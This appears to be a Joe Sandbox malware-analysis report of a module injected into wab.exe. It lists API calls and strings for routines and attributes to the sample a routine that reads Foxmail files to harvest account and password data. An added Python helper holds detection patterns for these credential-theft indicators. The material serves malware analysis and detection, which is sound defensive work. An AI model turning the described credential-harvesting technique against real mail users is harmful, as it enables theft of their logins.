                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction ID: 1551dc1474e02882f6c17b225503da2b59e9ac0f377af2299f4b7a87d1e4beff
                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction Fuzzy Hash: DBF0F0416893403CFB1346B42C45EBA5FFC8B67660B101AB6E2C0CB183D9ADC606B3F6
                      APIs
                      • GetLastError.KERNEL32(?,?,24573518,245723F1,24571F17), ref: 24573864
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 24573872
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2457388B
                      • SetLastError.KERNEL32(00000000,?,24573518,245723F1,24571F17), ref: 245738DD
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: fb5fc453d8757b86944298231670663b9b1991edfbb43c61055141a3533d490f
                      • Instruction ID: e6637cfa15b841eb331918f8fedcb7bf2264b6df7940cafabcd2a85497ffd298
                      • Opcode Fuzzy Hash: fb5fc453d8757b86944298231670663b9b1991edfbb43c61055141a3533d490f
                      • Instruction Fuzzy Hash: 3201F73269A7259EF7021A797C889062BB4EB99675730023AF1D4B90D1FFEA9841F340
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 245761DA
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 245761E4
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 245761F1
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: 377f1020e4271210b5b5beb1dcccac4f6329d4c9137a4585013d925cfb472aaf
                      • Instruction ID: 740da0a3a6478ec6c2e96384c38868aec9433adf6a0ab647a58b7a0157cf612b
                      • Opcode Fuzzy Hash: 377f1020e4271210b5b5beb1dcccac4f6329d4c9137a4585013d925cfb472aaf
                      • Instruction Fuzzy Hash: 4631057490122CABCB21DF25D988B8DBBB8FF18310F1041EAE85CAB250E7349B858F44
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000,00000001,24572082,24582108,?,24571F3A,?), ref: 24574AD5
                      • TerminateProcess.KERNEL32(00000000,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000,00000001,24572082,24582108,?,24571F3A,?), ref: 24574ADC
                      • ExitProcess.KERNEL32 ref: 24574AEE
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: aa9f58f699355b4cce2619a89151a42c1c460665a78b50e22ae94ce02692fd8b
                      • Instruction ID: 4e2872a7a0788076a04b9d24b4b4ee392b90c981611767c7a7c2158fbc923f56
                      • Opcode Fuzzy Hash: aa9f58f699355b4cce2619a89151a42c1c460665a78b50e22ae94ce02692fd8b
                      • Instruction Fuzzy Hash: 6AE0BF35400214AFDF016F65DD09A493F7AFF41751B508034F98557161EB39DD46DA54
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: .
                      • API String ID: 0-248832578
                      • Opcode ID: 68b687a086bf009adb358b9f230a3f5580965e046f24f6cd0dbffe9437479505
                      • Instruction ID: fd08e89979c2ab591cdcae1c3c3a34b44a51593b1064cbac4ae5789094d15139
                      • Opcode Fuzzy Hash: 68b687a086bf009adb358b9f230a3f5580965e046f24f6cd0dbffe9437479505
                      • Instruction Fuzzy Hash: E1314471900209AFDB148F38DC84EEA7BFDDB85724F4001BCE998D7295E6309A45EB60
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: f8d2755420ffda994b263f946c65e30451746115f7b093b01a93b853417e4c9f
                      • Instruction ID: 2b523426daf8dda6a6bbd745457b5402f40dbbd55043458602bfe4732545f90a
                      • Opcode Fuzzy Hash: f8d2755420ffda994b263f946c65e30451746115f7b093b01a93b853417e4c9f
                      • Instruction Fuzzy Hash: C2A011B02002028F83008E30820A20C3AACFA002803002028F888E0080FB2C80808A00

                      Control-flow Graph (summary of the viewer's graph data for 2457173a): basic blocks 2457173a..245719b1; calls 2457c030, 24572c40, 24571cca (file copy/read), 24571ede, 24571ee7, 245744b0 (the _strlen calls listed below), 24571db7, 245716aa, 245715da.
                      APIs
                        • Part of subcall function 24571CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D1B
                        • Part of subcall function 24571CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24571D37
                        • Part of subcall function 24571CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D4B
                      • _strlen.LIBCMT ref: 24571855
                      • _strlen.LIBCMT ref: 24571869
                      • _strlen.LIBCMT ref: 2457188B
                      • _strlen.LIBCMT ref: 245718AE
                      • _strlen.LIBCMT ref: 245718C8
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _strlen$File$CopyCreateDelete
                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                      • API String ID: 3296212668-3023110444
                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction ID: 5d1f01497917f16749cb02bcea5b27da6b889520c685871383f98273a326cf90
                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction Fuzzy Hash: 3E610571D00218AFFF12CBA4D840BDEBBB9AF95204F0044B6D284AB35DDB749A46EF55
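                      The two routines above work together: 245712ee builds a path from GetEnvironmentVariableW("ProgramFiles") and "Foxmail" and walks it with FindFirstFileW/FindNextFileW, and 2457173a copies each file, reads the copy and deletes it (CopyFileW, CreateFileW with GENERIC_READ/OPEN_EXISTING, ReadFile, DeleteFileW) before searching it for the keyword fragments listed under String ID, so "Account" and "Password" never appear whole in the module. The triage helper below is an added example written for this report, not code from the sample, from Remcos or from Joe Sandbox; every function and constant name in it is mine. It reassembles the fragments the way the lstrcatW/_strlen loop does and scans a memory image for the split literals and the wide strings. Assumptions beyond what the report lists: the fragments are stored as separate NUL-terminated ANSI literals, their concatenation order is inferred from the words they form, and the two buffers are constructed here rather than taken from the .sdmp files.

```python
"""Triage helper for the Foxmail credential routine in the wab.exe module at
0x24570000 (added example; not code from the sample or from Joe Sandbox)."""
import re

# Keyword fragments as listed under "String ID" for 2457173a. The concatenation
# order is an assumption inferred from the words they form.
SPLIT_KEYWORDS = {
    "Account": ("Acco", "un", "t"),
    "Password": ("Pass", "word"),
    "POP3": ("POP3",),
}
# Wide strings listed for 245712ee; the W APIs it calls consume UTF-16LE.
WIDE_STRINGS = ("ProgramFiles", "Foxmail")


def reassemble(fragments):
    """The keyword the routine builds at runtime by concatenating its fragments."""
    return "".join(fragments)


def find_ansi_literal(buf, text):
    """Offsets of `text` stored as a NUL-terminated ANSI literal, i.e. preceded by
    a NUL (or the buffer start) and followed by a NUL. Assumption: the fragments
    are laid out as separate C strings in the module's data."""
    pat = re.compile(rb"(?:^|(?<=\x00))" + re.escape(text.encode("ascii")) + rb"\x00")
    return [m.start() for m in pat.finditer(buf)]


def find_wide_literal(buf, text):
    """Offsets of `text` encoded as UTF-16LE."""
    return [m.start() for m in re.finditer(re.escape(text.encode("utf-16-le")), buf)]


def scan_dump(buf):
    """Look for the split-keyword layout plus the Foxmail path strings.
    'match' is True when every keyword's multi-character fragments and both wide
    strings are present; 'intact_present' is reported separately so the analyst
    can tell a module that stores the keyword whole from one that splits it."""
    keywords = {}
    for word, frags in SPLIT_KEYWORDS.items():
        hits = {f: find_ansi_literal(buf, f) for f in frags}
        # A single-letter fragment such as "t" also matches inside UTF-16 text
        # (e.g. the bytes of "xt"), so only fragments of two or more characters
        # count towards the verdict; the single-letter hits are still reported.
        strong = [f for f in frags if len(f) >= 2]
        keywords[word] = {
            "fragments": hits,
            "split_present": all(hits[f] for f in strong),
            "intact_present": bool(find_ansi_literal(buf, word)),
        }
    wide = {s: find_wide_literal(buf, s) for s in WIDE_STRINGS}
    match = all(k["split_present"] for k in keywords.values()) and all(wide.values())
    return {"keywords": keywords, "wide": wide, "match": match}


def _ansi(*strings):
    return b"".join(s.encode("ascii") + b"\x00" for s in strings)


def _wide(*strings):
    return b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in strings)


# Constructed stand-ins for a dumped data section (not bytes from the real dump):
# the first mimics the split layout the report lists, the second a benign module
# that stores the keywords whole and never references Foxmail.
SAMPLE_DUMP = (b"\x90" * 16 + b"\x00" + _ansi("Acco", "POP3", "Pass", "t", "un", "word")
               + b"\x00" * 8 + _wide("ProgramFiles", "Foxmail") + b"\xcc" * 16)
BENIGN_DUMP = b"\x00" + _ansi("Account", "Password", "POP3") + _wide("ProgramFiles")


if __name__ == "__main__":
    print("keywords built at runtime:",
          {w: reassemble(f) for w, f in SPLIT_KEYWORDS.items()})
    for name, buf in (("sample", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        print(name, "match:", scan_dump(buf)["match"])
```

                      To use it on the report's data, read the 0000000024571000 .sdmp file as bytes and pass it to scan_dump; the returned offsets are relative to the start of that dump, so add the dump's base to get module addresses.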

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %m$~$Gon~$~F@7$~dra
                      • API String ID: 4218353326-230879103
                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction ID: f6121e37d7088cc1cd5a2c33707acc6fc83d23d3b99d1c19279922108ca5cf6d
                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction Fuzzy Hash: 35711A71D00228ABEF129BB49884ADF7FFC9F55204F1440B6E684D7245E674D785EBA0

                      Control-flow Graph (summary of the viewer's graph data for 24577cc2): basic blocks 24577cc2..24577e0b; calls 24577e35, 2457571e (the _free calls listed below, repeatedly), 245790ba (___free_lconv_mon), 245791b8.
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 24577D06
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245790D7
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245790E9
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245790FB
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457910D
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457911F
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579131
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579143
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579155
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579167
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579179
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457918B
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457919D
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245791AF
                      • _free.LIBCMT ref: 24577CFB
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 24577D1D
                      • _free.LIBCMT ref: 24577D32
                      • _free.LIBCMT ref: 24577D3D
                      • _free.LIBCMT ref: 24577D5F
                      • _free.LIBCMT ref: 24577D72
                      • _free.LIBCMT ref: 24577D80
                      • _free.LIBCMT ref: 24577D8B
                      • _free.LIBCMT ref: 24577DC3
                      • _free.LIBCMT ref: 24577DCA
                      • _free.LIBCMT ref: 24577DE7
                      • _free.LIBCMT ref: 24577DFF
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 6176e0447be42fb4b46e40255d2384a1fa862cdcfc627a61cebe7f58ba8b0a0a
                      • Instruction ID: 4af40e3a078ce7f72c07b305ea8a2b6132d92b8b4e95434346484394407d3cee
                      • Opcode Fuzzy Hash: 6176e0447be42fb4b46e40255d2384a1fa862cdcfc627a61cebe7f58ba8b0a0a
                      • Instruction Fuzzy Hash: 36316D31610A08EFEB219B38F844B667BF9EF80250F10847AE8C9DB555DE71F990EB14

                      Control-flow Graph

                      APIs
                      • _free.LIBCMT ref: 245759EA
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 245759F6
                      • _free.LIBCMT ref: 24575A01
                      • _free.LIBCMT ref: 24575A0C
                      • _free.LIBCMT ref: 24575A17
                      • _free.LIBCMT ref: 24575A22
                      • _free.LIBCMT ref: 24575A2D
                      • _free.LIBCMT ref: 24575A38
                      • _free.LIBCMT ref: 24575A43
                      • _free.LIBCMT ref: 24575A51
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: d1632eb208fbd1e9c1d06d3daea55ec48346596a66fc158c3f1e0ba9f044f610
                      • Instruction ID: 00dbac988030aaf3558a31168aa80602556c32d9788c728d9f38df85a663cbff
                      • Opcode Fuzzy Hash: d1632eb208fbd1e9c1d06d3daea55ec48346596a66fc158c3f1e0ba9f044f610
                      • Instruction Fuzzy Hash: 1211A47A52014CEFDB11DF54C841CDD3FB5EF94290B1540B9BA498BA29DA31DA50EB84

                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 7f45c539e2f51b2af6085eed6848d70d3d0149a9087dd447d752e09c2d1e04ea
                      • Instruction ID: 2b1ea496660d6e10df1fc01bb0df9bfebfc0e704ae1ee1ed46507b93bb10af76
                      • Opcode Fuzzy Hash: 7f45c539e2f51b2af6085eed6848d70d3d0149a9087dd447d752e09c2d1e04ea
                      • Instruction Fuzzy Hash: 66519C70A0460ADBDB028FA4ED889DCBFB5FB49310F1046A5F5C4A7254DB358E64EB15

                      Control-flow Graph

                      APIs
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D1B
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24571D37
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D4B
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D58
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D72
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D7D
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D8A
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                      • String ID:
                      • API String ID: 1454806937-0
                      • Opcode ID: 42718bcf5c4db807820cdd01f7f18267ad1da5c3f8dac93592464a74e72128b3
                      • Instruction ID: 49b418948ef92fd5682d8d5c95f856f41a94c828f1e3fc58e0e24c52c7b67d1b
                      • Opcode Fuzzy Hash: 42718bcf5c4db807820cdd01f7f18267ad1da5c3f8dac93592464a74e72128b3
                      • Instruction Fuzzy Hash: C6212CB194121CBFE7119BA09C8CEEA7ABCFB58354F0009B5F591E2184F774AE499B70

                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,24579C07,?,00000000,?,00000000,00000000), ref: 245794D4
                      • __fassign.LIBCMT ref: 2457954F
                      • __fassign.LIBCMT ref: 2457956A
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 24579590
                      • WriteFile.KERNEL32(?,?,00000000,24579C07,00000000,?,?,?,?,?,?,?,?,?,24579C07,?), ref: 245795AF
                      • WriteFile.KERNEL32(?,?,00000001,24579C07,00000000,?,?,?,?,?,?,?,?,?,24579C07,?), ref: 245795E8
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: e666a90a43810bef58ba51f6e6a7a4fc878299c542b85ca2dab63d75e62c7014
                      • Instruction ID: a9c37bb2dbc182ff4467d91eb3c73cb279f0a915f588c72cc3411af4677d4b13
                      • Opcode Fuzzy Hash: e666a90a43810bef58ba51f6e6a7a4fc878299c542b85ca2dab63d75e62c7014
                      • Instruction Fuzzy Hash: 555193B1A002499FDB00CFA4D895ADEBBF9FF09310F14456AE995E7281E7709941CB60

                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 2457339B
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 245733A3
                      • _ValidateLocalCookies.LIBCMT ref: 24573431
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 2457345C
                      • _ValidateLocalCookies.LIBCMT ref: 245734B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 7180aff4c8f6fda51e8f68212e69c3de92007192dd9bb61b15a8ef1eaec99a97
                      • Instruction ID: d0850ee1a9ad8b4b0d4152a34b283108215800a393dc956c61a4a74e3cea9d3d
                      • Opcode Fuzzy Hash: 7180aff4c8f6fda51e8f68212e69c3de92007192dd9bb61b15a8ef1eaec99a97
                      • Instruction Fuzzy Hash: 34410934A40208ABCF05CF68D844A8EBFB6FF85234F0081B5E9946B355D7B1DA05DB91

                      Control-flow Graph

                      APIs
                        • Part of subcall function 24579221: _free.LIBCMT ref: 2457924A
                      • _free.LIBCMT ref: 245792AB
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 245792B6
                      • _free.LIBCMT ref: 245792C1
                      • _free.LIBCMT ref: 24579315
                      • _free.LIBCMT ref: 24579320
                      • _free.LIBCMT ref: 2457932B
                      • _free.LIBCMT ref: 24579336
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction ID: 8004b4a44ce76213312b97928b31a94c777e0ded05ca983ea6337b5b907327f4
                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction Fuzzy Hash: C8117F31650B08EAF620FBB0DC45FCBBBBD9F98700F400838A7DA76056DA24F504A661
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,24576FFD,00000000,?,?,?,24578A72,?,?,00000100), ref: 2457887B
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,24578A72,?,?,00000100,5EFC4D8B,?,?), ref: 24578901
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 245789FB
                      • __freea.LIBCMT ref: 24578A08
                        • Part of subcall function 245756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24575702
                      • __freea.LIBCMT ref: 24578A11
                      • __freea.LIBCMT ref: 24578A36
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: b861842815f5993d6df4389a944afb190b3ed85e4069d8d5c695e3815cdbfecb
                      • Instruction ID: b506df3bcf09fcc05672befb916cdbaaf2044a4daa77fd7cd173e7931399f54b
                      • Opcode Fuzzy Hash: b861842815f5993d6df4389a944afb190b3ed85e4069d8d5c695e3815cdbfecb
                      • Instruction Fuzzy Hash: B951E47261021AAFEB158E60DC40EBB3BBAEF90660F114A79FD44D6144EB3CDC50E690
                      APIs
                      • lstrcatW.KERNEL32(?,?), ref: 24571038
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2457104B
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 24571061
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 24571075
                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 24571090
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 245710B8
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$AttributesFilelstrcat
                      • String ID:
                      • API String ID: 3594823470-0
                      • Opcode ID: b78317c26645ef7865ec3719f339dad4b7390358f4e60470cdb2ba76ef6cc2f9
                      • Instruction ID: 0d1389291851bbba58fab72f766af7f380ef47fc7ce53a88b3ec8fd0b777ebc6
                      • Opcode Fuzzy Hash: b78317c26645ef7865ec3719f339dad4b7390358f4e60470cdb2ba76ef6cc2f9
                      • Instruction Fuzzy Hash: D22183359003289BDF11DB60EC48DDB3778EF84214F1041A6E995A72A9EE30DA89DB40
                      APIs
                      • GetLastError.KERNEL32(?,?,24576C6C), ref: 24575AFA
                      • _free.LIBCMT ref: 24575B2D
                      • _free.LIBCMT ref: 24575B55
                      • SetLastError.KERNEL32(00000000,?,?,24576C6C), ref: 24575B62
                      • SetLastError.KERNEL32(00000000,?,?,24576C6C), ref: 24575B6E
                      • _abort.LIBCMT ref: 24575B74
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
